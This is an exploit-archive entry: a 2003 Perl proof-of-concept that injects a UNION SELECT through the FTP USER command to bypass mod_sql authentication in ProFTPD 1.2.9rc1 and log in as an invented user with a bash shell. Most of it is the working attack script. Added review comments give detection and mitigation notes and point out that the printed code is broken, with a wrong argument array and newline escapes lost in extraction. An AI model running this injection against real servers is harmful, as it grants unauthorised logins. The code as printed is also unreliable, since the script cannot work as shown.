
# Title : ProFTPD 1.2.9RC1 (mod_sql) Remote SQL Injection Exploit
# Published : 2003-06-19
# Author : Spaine


#!/usr/bin/perl
# ProFTPD 1.2.9 rc1 mod_sql SQL Injection remote Exploit
# Spaine - 2003
#
# Proof of concept for the mod_sql authentication-query injection in the
# ProFTPD version named above.  The FTP USER name is placed into mod_sql's
# user-lookup query without escaping: the username sent below closes the
# quoted value and appends a UNION SELECT that supplies its own
# user/pass/uid/gid/shell row.  A "230" (logged in) reply to "PASS p" is
# then taken as evidence that the injected row was accepted.
#
# Defensive notes:
#  - Detection: a USER command containing a quote followed by "UNION SELECT"
#    in the FTP auth/transfer log, or in mod_sql's query log, is a direct
#    indicator of this probe.
#  - Mitigation: mod_sql must escape or bind the username before building
#    the query; the database account mod_sql uses should have read-only
#    access limited to the user table so an injected query cannot do more.
#
# NOTE(review): no "use strict; use warnings;" -- every variable below is an
# undeclared package global.  Also, the bare "n" at the end of the string
# literals looks like a "\n" escape that lost its backslash when the page
# was extracted; as printed, none of the lines sent or displayed are
# newline-terminated.  Code is kept verbatim.

use IO::Socket;
# NOTE(review): @ARGC is never assigned (the command-line array is @ARGV),
# so as written this guard is always true and the script prints the usage
# text and exits before connecting.
if(@ARGC<2){
    print "nProof Of Concept Sql Inject on ProFTPDn";
    print "Usage: perl poc-sqlftp <target> [1=Alternate query]nn";
    exit(0);
};

$server = $ARGV[0];   # target host, used unvalidated as PeerAddr
$query = $ARGV[1];    # "1" selects the six-column variant of the query
# Plain TCP connection to the FTP control port (21).
$remote = 
IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1) 
                          or die "Can't connect. n";
# Echo the server banner.
if(defined($line=<$remote>)){
    print STDOUT $line;
}

# Proof of concept query, it may change on the number of rows
# By default, it can query User, Pass, Uid, Gid, Shell or
# User, Pass, Uid, Gid, Shell, Path, change the union query...
# (The column count of the UNION must match the SELECT mod_sql issues,
# which is why two variants exist.  Each string, including the trailing
# bare "n", is sent exactly as written.)

if($query eq "1"){
    print $remote "USER ')UNION 
SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='n";
}else{
    print $remote "USER ')UNION SELECT'u','p',1002,1002,'/bin/bash' 
WHERE(''='n";
};
# Echo the reply to USER.
if(defined($line=<$remote>)){
    print STDOUT $line;
}
# The password 'p' matches the literal 'p' supplied in the injected row.
print $remote "PASS pn";
if(defined($line=<$remote>)){
    print STDOUT $line;
}
print "Sent query to $ARGV[0]n";
# Only the most recently read reply line is inspected; 230 is the FTP
# "user logged in" code.
if($line =~ /230/){  #logged in
    print "[------- Sql Inject Able n";
}else{
    print "[------- Sql Inject Unable n";
}
close $remote;

# www.Syue.com [2003-06-19]